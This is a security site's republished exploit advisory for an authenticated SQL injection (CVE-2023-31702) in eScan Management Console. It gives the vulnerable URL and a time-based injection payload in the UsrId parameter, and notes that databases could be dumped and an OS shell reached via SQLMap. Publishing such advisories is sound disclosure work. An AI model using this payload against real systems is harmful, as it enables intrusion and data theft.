Exploit/Advisories

Published on May 25th, 2023 📆 | 6512 Views ⚑

0

eScan Management Console 14.0.1400.2281 SQL Injection – Torchsec

Convert Text to Speech

# Exploit Title: eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
# Date: 16/05/2023
# Exploit Author: Sahil Ojha
# Vendor Homepage: https://www.escanav.com
# Software Link: https://cl.escanav.com/ewconsole.dll
# Version: 14.0.1400.2281
# Tested on: Windows
# CVE : CVE-2023-31702*Step of Reproduction/Proof of concept(POC)*
1. Login into the escan management console with a valid username and
password as root user.
2. Navigate to URL:
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=4176
3. Inject the payload into the UsrId parameter to confirm the SQL
injection as shown below:
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR
DELAY '0:0:5'--&cnt=4176
4. The time delay of 5 seconds confirmed that "UsrId" parameter was
vulnerable to SQL Injection. Furthermore, it was also possible to dump
all the databases and inject OS shell directly into the MS SQL Server
using SQLMap tool.

Tagged with: 14.0.1400.2281 • console • escan • injection • management • SQL • torchsec

Leave a Reply Cancel reply

🌟 Your Account

Username/Email Password
Remember Me
Register
🔔 Email Subscriptions

Get new posts by email
- Donate Via Wallets
  MetaMask
  
  Trust Wallet
  
  Binance Wallet
  
  WalletConnect
Popular
- Get a SmartThings Station for $1, save 98% now May 16, 2023 — Recommendations are independently chosen by Reviewed’s editors. Purchases you…
- The True Cost of a Free Telly TV May 21, 2023 There’s no such thing as a free lunch. Nor is…
- Red Hat Security Advisory 2023-0584-01 – Torchsec May 20, 2023 -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256=====================================================================Red Hat Security AdvisorySynopsis: Moderate: Secondary…
- Sony A95K vs Samsung S95C: Which should you buy? May 13, 2023 This year marks the second generation of QD-OLED, a new…
- Pydio Cells 4.1.2 Server-Side Request Forgery… May 30, 2023 For longer running processes, Pydio Cells allows for the creation…
Gloss
- link slot online on Apple Security Advisory 2023-05-03-1 – Torchsec
- philippines bingo app live online on Apple Security Advisory 2023-05-03-1 – Torchsec
- nba Games odds today philippines on Apple Security Advisory 2023-05-03-1 – Torchsec
- Website on Apple Security Advisory 2023-05-03-1 – Torchsec
- online live bingo app philippines bingoplus on Apple Security Advisory 2023-05-03-1 – Torchsec
- arena plus nba injury report ph on Apple Security Advisory 2023-05-03-1 – Torchsec
- vikiofb on Investing in AI: how to avoid the hype
- vikierm on SitemagicCMS 4.4.3 Shell Upload – Torchsec
- playoffs on Apple Security Advisory 2023-05-03-1 – Torchsec
- bingoplus philippines online bingo app on Apple Security Advisory 2023-05-03-1 – Torchsec
Feed
- Your trial feed URL has expired June 9, 2023
  Please create a new one for free or upgrade your subscription plan to get a persistent URL at MySitemapGenerator.com
  MySitemapGenerator
☕️Social Media

Torchsec

Tweets by Torch_sec
👥Members

Newest | Active | Popular
- Anna Shipman
  
  registered 1 day, 6 hours ago
- venomlightingllc
  
  registered 1 day, 19 hours ago
- fleurdebreezehvac
  
  registered 1 day, 19 hours ago
- swankycelebs02
  
  registered 4 days, 6 hours ago
- Janessa Sadler
  
  registered 5 days, 2 hours ago
🌍 Forum Groups

Newest | Active | Popular | Alphabetical
- Programming & coding
  
  active 1 day, 6 hours ago
- General Talk
  
  active 1 day, 6 hours ago
- Help Me !!
  
  active 1 day, 6 hours ago
- Comments & Suggestions
  
  active 1 day, 6 hours ago
- Ebooks – Papers
  
  active 1 day, 6 hours ago

We share and comment on interesting infosec related news, tools and more. Follow us on RSS ,Facebook or Twitter for the latest updates. Torchsec is designed to help Auditors, Pentesters & Security Experts to keep their ethical hacking oriented toolbox up-to-date .
This website is made for educational and ethical testing purposes only。It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this website.

Archives

© Torchsec Privacy Policy Disclaimer T&C

Back to Top ↑